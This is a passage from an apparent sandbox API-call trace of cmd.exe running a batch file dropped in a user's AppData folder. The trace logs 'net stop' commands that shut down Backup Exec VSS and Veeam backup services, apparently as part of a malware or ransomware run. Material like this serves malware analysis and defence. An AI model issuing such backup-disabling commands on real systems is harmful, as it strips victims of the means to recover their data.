lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0212.281] GetLastError () returned 0x2 [0212.281] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0212.281] GetLastError () returned 0x2 [0212.282] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.282] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0212.282] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0212.283] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0212.283] GetLastError () returned 0x2 [0212.283] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0212.283] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0212.284] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.284] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0212.284] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0212.284] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0212.284] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0212.284] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop BackupExecVSSProvider /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop BackupExecVSSProvider /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop BackupExecVSSProvider /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xa24, dwThreadId=0xa08)) returned 1 [0212.307] CloseHandle (hObject=0x78) returned 1 [0212.307] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0212.307] GetProcessHeap () returned 0x3e0000 [0212.307] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0212.307] GetEnvironmentStringsW () returned 0x3f8408* [0212.307] GetProcessHeap () returned 0x3e0000 [0212.307] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0212.308] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0212.308] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0212.435] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0212.435] CloseHandle (hObject=0x74) returned 1 [0212.435] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0212.435] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0212.435] GetProcessHeap () returned 0x3e0000 [0212.435] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0212.435] GetEnvironmentStringsW () returned 0x3f8408* [0212.436] GetProcessHeap () returned 0x3e0000 [0212.436] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0212.436] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0212.436] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0212.436] GetProcessHeap () returned 0x3e0000 [0212.436] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0212.436] GetEnvironmentStringsW () returned 0x3f8408* [0212.436] GetProcessHeap () returned 0x3e0000 [0212.436] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0212.437] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0212.437] GetProcessHeap () returned 0x3e0000 [0212.437] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0212.437] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0212.437] _get_osfhandle (_FileHandle=1) returned 0x264 [0212.437] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0212.437] _get_osfhandle (_FileHandle=1) returned 0x264 [0212.437] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0212.437] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0212.437] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0212.437] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0212.437] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0212.438] SetConsoleInputExeNameW () returned 0x1 [0212.438] GetConsoleOutputCP () returned 0x1b5 [0212.438] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0212.438] SetThreadUILanguage (LangId=0x0) returned 0x409 [0212.438] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0212.438] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0212.438] _get_osfhandle (_FileHandle=3) returned 0x74 [0212.438] SetFilePointer (in: hFile=0x74, lDistanceToMove=5154, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1422 [0212.438] GetProcessHeap () returned 0x3e0000 [0212.438] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0212.438] GetProcessHeap () returned 0x3e0000 [0212.438] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0212.438] GetProcessHeap () returned 0x3e0000 [0212.438] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0212.438] GetProcessHeap () returned 0x3e0000 [0212.438] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0212.438] GetProcessHeap () returned 0x3e0000 [0212.438] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0212.438] GetProcessHeap () returned 0x3e0000 [0212.438] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0212.438] GetProcessHeap () returned 0x3e0000 [0212.438] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0212.439] GetProcessHeap () returned 0x3e0000 [0212.439] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0212.439] GetProcessHeap () returned 0x3e0000 [0212.439] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0212.439] GetProcessHeap () returned 0x3e0000 [0212.439] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0212.439] GetProcessHeap () returned 0x3e0000 [0212.439] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0212.439] GetProcessHeap () returned 0x3e0000 [0212.439] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0212.439] GetProcessHeap () returned 0x3e0000 [0212.439] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0212.439] _get_osfhandle (_FileHandle=3) returned 0x74 [0212.439] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1422 [0212.439] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x49f, lpOverlapped=0x0) returned 1 [0212.439] SetFilePointer (in: hFile=0x74, lDistanceToMove=5193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1449 [0212.439] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=39, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop VeeamEnterpriseManagerSvc /y\r\n¥ /y\r\n\r\n¥ /y\r\nures\r\nnded\r\n") returned 39 [0212.439] _get_osfhandle (_FileHandle=3) returned 0x74 [0212.440] GetFileType (hFile=0x74) returned 0x1 [0212.440] _get_osfhandle (_FileHandle=3) returned 0x74 [0212.440] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1449 [0212.440] GetProcessHeap () returned 0x3e0000 [0212.440] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0212.440] GetProcessHeap () returned 0x3e0000 [0212.440] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0212.443] _tell (_FileHandle=3) returned 5193 [0212.443] _close (_FileHandle=3) returned 0 [0212.443] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0212.443] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0212.443] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0212.443] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0212.443] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0212.443] _wcsicmp (_String1="net", _String2="CD") returned 11 [0212.443] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0212.444] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0212.444] _wcsicmp (_String1="net", _String2="REN") returned -4 [0212.444] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0212.444] _wcsicmp (_String1="net", _String2="SET") returned -5 [0212.444] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0212.444] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0212.444] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0212.444] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0212.444] _wcsicmp (_String1="net", _String2="MD") returned 1 [0212.444] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0212.444] _wcsicmp (_String1="net", _String2="RD") returned -4 [0212.444] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0212.444] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0212.444] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0212.444] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0212.444] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0212.444] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0212.444] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0212.444] _wcsicmp (_String1="net", _String2="VER") returned -8 [0212.444] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0212.444] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0212.444] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0212.444] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0212.444] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0212.444] _wcsicmp (_String1="net", _String2="START") returned -5 [0212.444] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0212.444] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0212.444] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0212.444] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0212.444] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0212.444] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0212.444] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0212.444] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0212.444] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0212.444] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0212.445] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0212.445] SetErrorMode (uMode=0x0) returned 0x1 [0212.445] GetProcessHeap () returned 0x3e0000 [0212.445] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0212.445] GetProcessHeap () returned 0x3e0000 [0212.445] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0212.445] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0212.445] GetProcessHeap () returned 0x3e0000 [0212.445] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0212.445] GetProcessHeap () returned 0x3e0000 [0212.445] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0212.446] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0212.446] GetProcessHeap () returned 0x3e0000 [0212.446] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0212.446] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.446] GetProcessHeap () returned 0x3e0000 [0212.446] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0212.446] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0212.446] GetProcessHeap () returned 0x3e0000 [0212.446] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0212.447] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.447] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0212.447] GetLastError () returned 0x2 [0212.448] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0212.448] GetLastError () returned 0x2 [0212.448] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.449] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0212.449] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0212.449] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0212.449] GetLastError () returned 0x2 [0212.450] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0212.450] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0212.450] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.451] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0212.451] SetErrorMode (uMode=0x0) returned 0x1 [0212.451] GetProcessHeap () returned 0x3e0000 [0212.451] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0212.451] GetProcessHeap () returned 0x3e0000 [0212.451] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0212.451] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0212.451] GetProcessHeap () returned 0x3e0000 [0212.451] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0212.451] GetProcessHeap () returned 0x3e0000 [0212.451] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0212.452] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0212.452] GetProcessHeap () returned 0x3e0000 [0212.452] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0212.452] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.452] GetProcessHeap () returned 0x3e0000 [0212.452] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0212.452] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0212.452] GetProcessHeap () returned 0x3e0000 [0212.452] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0212.453] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.453] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0212.453] GetLastError () returned 0x2 [0212.453] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0212.454] GetLastError () returned 0x2 [0212.454] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.454] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0212.454] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0212.455] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0212.455] GetLastError () returned 0x2 [0212.455] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0212.455] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0212.456] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.456] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0212.456] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0212.456] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0212.457] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0212.457] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop VeeamEnterpriseManagerSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop VeeamEnterpriseManagerSvc /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop VeeamEnterpriseManagerSvc /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x8bc, dwThreadId=0xa30)) returned 1 [0212.461] CloseHandle (hObject=0x74) returned 1 [0212.461] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0212.461] GetProcessHeap () returned 0x3e0000 [0212.461] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0212.461] GetEnvironmentStringsW () returned 0x3f8408* [0212.461] GetProcessHeap () returned 0x3e0000 [0212.461] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0212.461] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0212.461] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0212.589] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0212.589] CloseHandle (hObject=0x78) returned 1 [0212.589] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0212.589] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0212.589] GetProcessHeap () returned 0x3e0000 [0212.589] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0212.589] GetEnvironmentStringsW () returned 0x3f8408* [0212.589] GetProcessHeap () returned 0x3e0000 [0212.589] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0212.590] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0212.590] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0212.590] GetProcessHeap () returned 0x3e0000 [0212.590] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0212.590] GetEnvironmentStringsW () returned 0x3f8408* [0212.590] GetProcessHeap () returned 0x3e0000 [0212.590] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0212.590] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0212.590] GetProcessHeap () returned 0x3e0000 [0212.590] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0212.590] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0212.590] _get_osfhandle (_FileHandle=1) returned 0x264 [0212.590] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0212.591] _get_osfhandle (_FileHandle=1) returned 0x264 [0212.591] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0212.591] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0212.591] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0212.591] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0212.591] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0212.591] SetConsoleInputExeNameW () returned 0x1 [0212.591] GetConsoleOutputCP () returned 0x1b5 [0212.591] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0212.591] SetThreadUILanguage (LangId=0x0) returned 0x409 [0212.592] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 